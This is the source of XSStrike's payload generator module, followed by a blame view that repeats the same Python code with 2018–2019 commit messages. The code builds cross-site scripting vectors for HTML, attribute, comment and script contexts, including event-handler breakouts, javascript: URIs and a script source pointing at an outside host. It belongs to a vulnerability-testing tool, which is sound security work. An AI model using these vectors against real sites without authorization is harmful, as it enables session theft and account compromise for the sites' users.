XSStrike/core/generator.py

from core.config import xsschecker, badTags, fillings, eFillings, lFillings, jFillings, eventHandlers, tags, functions
from core.jsContexter import jsContexter
from core.utils import randomUpper as r, genGen, extractScripts


def generator(occurences, response):
    scripts = extractScripts(response)
    index = 0
    vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),
               6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
    for i in occurences:
        context = occurences[i]['context']
        if context == 'html':
            lessBracketEfficiency = occurences[i]['score']['<']
            greatBracketEfficiency = occurences[i]['score']['>']
            ends = ['//']
            badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else ''
            if greatBracketEfficiency == 100:
                ends.append('>')
            if lessBracketEfficiency:
                payloads = genGen(fillings, eFillings, lFillings,
                                  eventHandlers, tags, functions, ends, badTag)
                for payload in payloads:
                    vectors[10].add(payload)
        elif context == 'attribute':
            found = False
            tag = occurences[i]['details']['tag']
            Type = occurences[i]['details']['type']
            quote = occurences[i]['details']['quote']
            attributeName = occurences[i]['details']['name']
            attributeValue = occurences[i]['details']['value']
            quoteEfficiency = occurences[i]['score'][quote] if quote in occurences[i]['score'] else 100
            greatBracketEfficiency = occurences[i]['score']['>']
            ends = ['//']
            if greatBracketEfficiency == 100:
                ends.append('>')
            if greatBracketEfficiency == 100 and quoteEfficiency == 100:
                payloads = genGen(fillings, eFillings, lFillings,
                                  eventHandlers, tags, functions, ends)
                for payload in payloads:
                    payload = quote + '>' + payload
                    found = True
                    vectors[9].add(payload)
            if quoteEfficiency == 100:
                for filling in fillings:
                    for function in functions:
                        vector = quote + filling + r('autofocus') + \
                            filling + r('onfocus') + '=' + quote + function
                        found = True
                        vectors[8].add(vector)
            if quoteEfficiency == 90:
                for filling in fillings:
                    for function in functions:
                        vector = '\\' + quote + filling + r('autofocus') + filling + \
                            r('onfocus') + '=' + function + filling + '\\' + quote
                        found = True
                        vectors[7].add(vector)
            if Type == 'value':
                if attributeName == 'srcdoc':
                    if occurences[i]['score']['&lt;']:
                        if occurences[i]['score']['&gt;']:
                            del ends[:]
                            ends.append('%26gt;')
                        payloads = genGen(
                            fillings, eFillings, lFillings, eventHandlers, tags, functions, ends)
                        for payload in payloads:
                            found = True
                            vectors[9].add(payload.replace('<', '%26lt;'))
                elif attributeName == 'href' and attributeValue == xsschecker:
                    for function in functions:
                        found = True
                        vectors[10].add(r('javascript:') + function)
                elif attributeName.startswith('on'):
                    closer = jsContexter(attributeValue)
                    quote = ''
                    for char in attributeValue.split(xsschecker)[1]:
                        if char in ['\'', '"', '`']:
                            quote = char
                            break
                    suffix = '//\\'
                    for filling in jFillings:
                        for function in functions:
                            vector = quote + closer + filling + function + suffix
                            if found:
                                vectors[7].add(vector)
                            else:
                                vectors[9].add(vector)
                    if quoteEfficiency > 83:
                        suffix = '//'
                        for filling in jFillings:
                            for function in functions:
                                if '=' in function:
                                    function = '(' + function + ')'
                                if quote == '':
                                    filling = ''
                                vector = '\\' + quote + closer + filling + function + suffix
                                if found:
                                    vectors[7].add(vector)
                                else:
                                    vectors[9].add(vector)
                elif tag in ('script', 'iframe', 'embed', 'object'):
                    if attributeName in ('src', 'iframe', 'embed') and attributeValue == xsschecker:
                        payloads = ['//15.rs', '\\/\\\\\\/\\15.rs']
                        for payload in payloads:
                            vectors[10].add(payload)
                    elif tag == 'object' and attributeName == 'data' and attributeValue == xsschecker:
                        for function in functions:
                            found = True
                            vectors[10].add(r('javascript:') + function)
                    elif quoteEfficiency == greatBracketEfficiency == 100:
                        payloads = genGen(fillings, eFillings, lFillings,
                                          eventHandlers, tags, functions, ends)
                        for payload in payloads:
                            payload = quote + '>' + r('</script/>') + payload
                            found = True
                            vectors[11].add(payload)
        elif context == 'comment':
            lessBracketEfficiency = occurences[i]['score']['<']
            greatBracketEfficiency = occurences[i]['score']['>']
            ends = ['//']
            if greatBracketEfficiency == 100:
                ends.append('>')
            if lessBracketEfficiency == 100:
                payloads = genGen(fillings, eFillings, lFillings,
                                  eventHandlers, tags, functions, ends)
                for payload in payloads:
                    vectors[10].add(payload)
        elif context == 'script':
            if scripts:
                try:
                    script = scripts[index]
                except IndexError:
                    script = scripts[0]
            else:
                continue
            closer = jsContexter(script)
            quote = occurences[i]['details']['quote']
            scriptEfficiency = occurences[i]['score']['</scRipT/>']
            greatBracketEfficiency = occurences[i]['score']['>']
            breakerEfficiency = 100
            if quote:
                breakerEfficiency = occurences[i]['score'][quote]
            ends = ['//']
            if greatBracketEfficiency == 100:
                ends.append('>')
            if scriptEfficiency == 100:
                breaker = r('</script/>')
                payloads = genGen(fillings, eFillings, lFillings,
                                  eventHandlers, tags, functions, ends)
                for payload in payloads:
                    vectors[10].add(payload)
            if closer:
                suffix = '//\\'
                for filling in jFillings:
                    for function in functions:
                        vector = quote + closer + filling + function + suffix
                        vectors[7].add(vector)
            elif breakerEfficiency > 83:
                suffix = '//'
                for filling in jFillings:
                    for function in functions:
                        if '=' in function:
                            function = '(' + function + ')'
                        if quote == '':
                            filling = ''
                        vector = '\\' + quote + closer + filling + function + suffix
                        vectors[6].add(vector)
            index += 1
    return vectors
v3.1.0 - browser engine integration for zero false positives - coverage of event handler context - bug fixes 2018-11-21 19:20:10 +05:30			`from core.config import xsschecker, badTags, fillings, eFillings, lFillings, jFillings, eventHandlers, tags, functions`
Add files via upload 2018-10-27 18:58:52 +05:30			`from core.jsContexter import jsContexter`
			`from core.utils import randomUpper as r, genGen, extractScripts`

Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30
Add files via upload 2018-10-27 18:58:52 +05:30			`def generator(occurences, response):`
			`scripts = extractScripts(response)`
			`index = 0`
Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30			`vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),`
			`6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}`
Add files via upload 2018-10-27 18:58:52 +05:30			`for i in occurences:`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`context = occurences[i]['context']`
Add files via upload 2018-10-27 18:58:52 +05:30			`if context == 'html':`
			`lessBracketEfficiency = occurences[i]['score']['<']`
			`greatBracketEfficiency = occurences[i]['score']['>']`
			`ends = ['//']`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else ''`
Add files via upload 2018-10-27 18:58:52 +05:30			`if greatBracketEfficiency == 100:`
			`ends.append('>')`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`if lessBracketEfficiency:`
Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30			`payloads = genGen(fillings, eFillings, lFillings,`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`eventHandlers, tags, functions, ends, badTag)`
Add files via upload 2018-10-27 18:58:52 +05:30			`for payload in payloads:`
			`vectors[10].add(payload)`
			`elif context == 'attribute':`
v3.1.0 - browser engine integration for zero false positives - coverage of event handler context - bug fixes 2018-11-21 19:20:10 +05:30			`found = False`
coverage of 6 edge cases 2019-04-19 14:34:01 +05:30			`tag = occurences[i]['details']['tag']`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`Type = occurences[i]['details']['type']`
coverage of 6 edge cases 2019-04-19 14:34:01 +05:30			`quote = occurences[i]['details']['quote']`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`attributeName = occurences[i]['details']['name']`
			`attributeValue = occurences[i]['details']['value']`
			`quoteEfficiency = occurences[i]['score'][quote] if quote in occurences[i]['score'] else 100`
Add files via upload 2018-10-27 18:58:52 +05:30			`greatBracketEfficiency = occurences[i]['score']['>']`
			`ends = ['//']`
			`if greatBracketEfficiency == 100:`
			`ends.append('>')`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`if greatBracketEfficiency == 100 and quoteEfficiency == 100:`
Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30			`payloads = genGen(fillings, eFillings, lFillings,`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`eventHandlers, tags, functions, ends)`
Add files via upload 2018-10-27 18:58:52 +05:30			`for payload in payloads:`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`payload = quote + '>' + payload`
v3.1.0 - browser engine integration for zero false positives - coverage of event handler context - bug fixes 2018-11-21 19:20:10 +05:30			`found = True`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`vectors[9].add(payload)`
			`if quoteEfficiency == 100:`
Add files via upload 2018-10-27 18:58:52 +05:30			`for filling in fillings:`
			`for function in functions:`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`vector = quote + filling + r('autofocus') + \`
			`filling + r('onfocus') + '=' + quote + function`
v3.1.0 - browser engine integration for zero false positives - coverage of event handler context - bug fixes 2018-11-21 19:20:10 +05:30			`found = True`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`vectors[8].add(vector)`
			`if quoteEfficiency == 90:`
Add files via upload 2018-11-11 14:56:19 +05:30			`for filling in fillings:`
			`for function in functions:`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`vector = '\\' + quote + filling + r('autofocus') + filling + \`
			`r('onfocus') + '=' + function + filling + '\\' + quote`
v3.1.0 - browser engine integration for zero false positives - coverage of event handler context - bug fixes 2018-11-21 19:20:10 +05:30			`found = True`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`vectors[7].add(vector)`
			`if Type == 'value':`
			`if attributeName == 'srcdoc':`
			`if occurences[i]['score']['<']:`
			`if occurences[i]['score']['>']:`
			`del ends[:]`
			`ends.append('%26gt;')`
			`payloads = genGen(`
			`fillings, eFillings, lFillings, eventHandlers, tags, functions, ends)`
			`for payload in payloads:`
			`found = True`
			`vectors[9].add(payload.replace('<', '%26lt;'))`
			`elif attributeName == 'href' and attributeValue == xsschecker:`
			`for function in functions:`
v3.1.0 - browser engine integration for zero false positives - coverage of event handler context - bug fixes 2018-11-21 19:20:10 +05:30			`found = True`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`vectors[10].add(r('javascript:') + function)`
			`elif attributeName.startswith('on'):`
			`closer = jsContexter(attributeValue)`
			`quote = ''`
			`for char in attributeValue.split(xsschecker)[1]:`
			if char in ['\'', '"', '`']:
			`quote = char`
			`break`
v3.1.0 - browser engine integration for zero false positives - coverage of event handler context - bug fixes 2018-11-21 19:20:10 +05:30			`suffix = '//\\'`
			`for filling in jFillings:`
			`for function in functions:`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`vector = quote + closer + filling + function + suffix`
v3.1.0 - browser engine integration for zero false positives - coverage of event handler context - bug fixes 2018-11-21 19:20:10 +05:30			`if found:`
			`vectors[7].add(vector)`
			`else:`
			`vectors[9].add(vector)`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`if quoteEfficiency > 83:`
			`suffix = '//'`
			`for filling in jFillings:`
			`for function in functions:`
			`if '=' in function:`
			`function = '(' + function + ')'`
			`if quote == '':`
			`filling = ''`
			`vector = '\\' + quote + closer + filling + function + suffix`
			`if found:`
			`vectors[7].add(vector)`
			`else:`
			`vectors[9].add(vector)`
coverage of 6 edge cases 2019-04-19 14:34:01 +05:30			`elif tag in ('script', 'iframe', 'embed', 'object'):`
			`if attributeName in ('src', 'iframe', 'embed') and attributeValue == xsschecker:`
			`payloads = ['//15.rs', '\\/\\\\\\/\\15.rs']`
			`for payload in payloads:`
			`vectors[10].add(payload)`
			`elif tag == 'object' and attributeName == 'data' and attributeValue == xsschecker:`
			`for function in functions:`
			`found = True`
			`vectors[10].add(r('javascript:') + function)`
			`elif quoteEfficiency == greatBracketEfficiency == 100:`
			`payloads = genGen(fillings, eFillings, lFillings,`
			`eventHandlers, tags, functions, ends)`
			`for payload in payloads:`
			`payload = quote + '>' + r('</script/>') + payload`
			`found = True`
			`vectors[11].add(payload)`
Add files via upload 2018-10-27 18:58:52 +05:30			`elif context == 'comment':`
			`lessBracketEfficiency = occurences[i]['score']['<']`
			`greatBracketEfficiency = occurences[i]['score']['>']`
			`ends = ['//']`
			`if greatBracketEfficiency == 100:`
			`ends.append('>')`
why are we still here? 2019-04-19 09:07:22 +05:30			`if lessBracketEfficiency == 100:`
Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30			`payloads = genGen(fillings, eFillings, lFillings,`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`eventHandlers, tags, functions, ends)`
Add files via upload 2018-10-27 18:58:52 +05:30			`for payload in payloads:`
			`vectors[10].add(payload)`
			`elif context == 'script':`
v3.1.0 - browser engine integration for zero false positives - coverage of event handler context - bug fixes 2018-11-21 19:20:10 +05:30			`if scripts:`
Fixes #79, Fixes 80, Fixes #81 2018-11-03 22:49:40 +05:30			`try:`
v3.1.0 - browser engine integration for zero false positives - coverage of event handler context - bug fixes 2018-11-21 19:20:10 +05:30			`script = scripts[index]`
			`except IndexError:`
Fixes #79, Fixes 80, Fixes #81 2018-11-03 22:49:40 +05:30			`script = scripts[0]`
v3.1.0 - browser engine integration for zero false positives - coverage of event handler context - bug fixes 2018-11-21 19:20:10 +05:30			`else:`
			`continue`
Add files via upload 2018-10-27 18:58:52 +05:30			`closer = jsContexter(script)`
fix script context handling 2019-04-19 08:59:12 +05:30			`quote = occurences[i]['details']['quote']`
Add files via upload 2018-10-27 18:58:52 +05:30			`scriptEfficiency = occurences[i]['score']['</scRipT/>']`
			`greatBracketEfficiency = occurences[i]['score']['>']`
fix script context handling 2019-04-19 08:59:12 +05:30			`breakerEfficiency = 100`
			`if quote:`
			`breakerEfficiency = occurences[i]['score'][quote]`
Add files via upload 2018-10-27 18:58:52 +05:30			`ends = ['//']`
			`if greatBracketEfficiency == 100:`
			`ends.append('>')`
			`if scriptEfficiency == 100:`
			`breaker = r('</script/>')`
Documentation and pep8 compilance 2018-11-16 21:13:45 +05:30			`payloads = genGen(fillings, eFillings, lFillings,`
adapt to API changes, support for more contexts 2019-04-19 07:56:17 +05:30			`eventHandlers, tags, functions, ends)`
Add files via upload 2018-10-27 18:58:52 +05:30			`for payload in payloads:`
			`vectors[10].add(payload)`
			`if closer:`
			`suffix = '//\\'`
			`for filling in jFillings:`
			`for function in functions:`
fix script context handling 2019-04-19 08:59:12 +05:30			`vector = quote + closer + filling + function + suffix`
Add files via upload 2018-10-27 18:58:52 +05:30			`vectors[7].add(vector)`
handle potential false positives in slash escape 2018-10-30 11:37:06 +05:30			`elif breakerEfficiency > 83:`
Add files via upload 2018-10-27 18:58:52 +05:30			`suffix = '//'`
			`for filling in jFillings:`
			`for function in functions:`
			`if '=' in function:`
			`function = '(' + function + ')'`
fix script context handling 2019-04-19 08:59:12 +05:30			`if quote == '':`
Add files via upload 2018-10-27 18:58:52 +05:30			`filling = ''`
fix script context handling 2019-04-19 08:59:12 +05:30			`vector = '\\' + quote + closer + filling + function + suffix`
Add files via upload 2018-10-27 18:58:52 +05:30			`vectors[6].add(vector)`
			`index += 1`
better multi js context injection 2018-11-10 21:24:53 +05:30			`return vectors`